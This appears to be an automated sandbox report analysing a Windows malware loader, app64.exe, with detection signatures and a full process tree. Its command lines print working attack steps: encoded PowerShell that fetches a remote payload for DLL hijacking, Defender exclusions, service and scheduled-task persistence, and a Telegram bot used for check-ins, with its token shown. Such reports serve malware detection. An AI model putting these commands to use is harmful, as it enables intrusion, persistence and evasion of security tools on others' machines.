Windows
Analysis Report
app64.exe
Overview
General Information
Detection
Score | Range | Whitelisted | Confidence
---|---|---|---
100 | 0 - 100 | false | 100%
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: TrustedPath UAC Bypass Pattern
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates a Windows Service pointing to an executable in C:\Windows
Drops PE files to the user root directory
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious New Service Creation
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious command line found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create an SMB header
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- app64.exe (PID: 2696 cmdline: "C:\Users\user\Desktop\app64.exe" MD5: 40B887735996FC88F47650C322273A25)
  - cmd.exe (PID: 5956 cmdline: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - powershell.exe (PID: 2124 cmdline: powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;" MD5: 04029E121A0CFA5991749937DD22A1D9)
  - cmd.exe (PID: 764 cmdline: "C:\Windows\system32\cmd.exe" /c mkdir "\\?\C:\Windows \System32" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - cmd.exe (PID: 5780 cmdline: "C:\Windows\system32\cmd.exe" /c xcopy /y C:\Windows\System32\printui.exe "C:\Windows \System32" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - xcopy.exe (PID: 5488 cmdline: xcopy /y C:\Windows\System32\printui.exe "C:\Windows \System32" MD5: 39FBFD3AF58238C6F9D4D408C9251FF5)
  - cmd.exe (PID: 5784 cmdline: "C:\Windows\system32\cmd.exe" /c move /y C:\Users\Public\pyld.dll "C:\Windows \System32\printui.dll" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - printui.exe (PID: 6656 cmdline: "C:\Windows \System32\printui.exe" MD5: 2FC3530F3E05667F8240FC77F7486E7E)
  - printui.exe (PID: 3752 cmdline: "C:\Windows \System32\printui.exe" MD5: 2FC3530F3E05667F8240FC77F7486E7E)
  - cmd.exe (PID: 7156 cmdline: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 4592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - powershell.exe (PID: 6620 cmdline: powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;" MD5: 04029E121A0CFA5991749937DD22A1D9)
  - cmd.exe (PID: 6436 cmdline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - powershell.exe (PID: 1400 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';" MD5: 04029E121A0CFA5991749937DD22A1D9)
  - cmd.exe (PID: 7132 cmdline: cmd.exe /c sc create x590769 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x590769\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x590769.dat" /f && sc start x590769 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 2460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - sc.exe (PID: 5548 cmdline: sc create x590769 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
  - reg.exe (PID: 7120 cmdline: reg add HKLM\SYSTEM\CurrentControlSet\services\x590769\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x590769.dat" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  - sc.exe (PID: 2556 cmdline: sc start x590769 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
  - cmd.exe (PID: 1632 cmdline: cmd.exe /c start "" "C:\Windows\System32\console_zero.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 3424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - console_zero.exe (PID: 2944 cmdline: "C:\Windows\System32\console_zero.exe" MD5: 49672519E74E8AD135DAE7345BCEFF41)
  - cmd.exe (PID: 4612 cmdline: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 1412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - schtasks.exe (PID: 5580 cmdline: schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  - cmd.exe (PID: 6568 cmdline: cmd.exe /c powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] user@123716: Installed success.'});" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 1996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - powershell.exe (PID: 5656 cmdline: powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] user@123716: Installed success.'});" MD5: 04029E121A0CFA5991749937DD22A1D9)
  - cmd.exe (PID: 4744 cmdline: cmd.exe /c timeout /t 14 /nobreak && rmdir /s /q "C:\Windows \" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 3848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - timeout.exe (PID: 6428 cmdline: timeout /t 14 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
  - cmd.exe (PID: 2696 cmdline: cmd.exe /c timeout /t 16 /nobreak && del /q "C:\Windows\System32\usvcldr64.dat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 5956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - timeout.exe (PID: 6580 cmdline: timeout /t 16 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
- svchost.exe (PID: 5276 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 4672 cmdline: C:\Windows\System32\svchost.exe -k DcomLaunch MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  - cmd.exe (PID: 432 cmdline: cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 4748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - powershell.exe (PID: 3184 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32' MD5: 04029E121A0CFA5991749937DD22A1D9)
  - cmd.exe (PID: 5864 cmdline: cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - powershell.exe (PID: 2820 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32' MD5: 04029E121A0CFA5991749937DD22A1D9)
  - cmd.exe (PID: 4332 cmdline: cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 1888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - powershell.exe (PID: 3092 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'E:\' MD5: 04029E121A0CFA5991749937DD22A1D9)
  - cmd.exe (PID: 4480 cmdline: cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - powershell.exe (PID: 3936 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'F:\' MD5: 04029E121A0CFA5991749937DD22A1D9)
- console_zero.exe (PID: 6284 cmdline: C:\Windows\System32\console_zero.exe MD5: 49672519E74E8AD135DAE7345BCEFF41)
  - cmd.exe (PID: 5860 cmdline: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 6308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - schtasks.exe (PID: 6100 cmdline: schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
- cleanup
No configs have been found
Source | Rule | Description | Author | Strings
---|---|---|---|---
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
Source | Rule | Description | Author | Strings
---|---|---|---|---
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
| JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
| JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |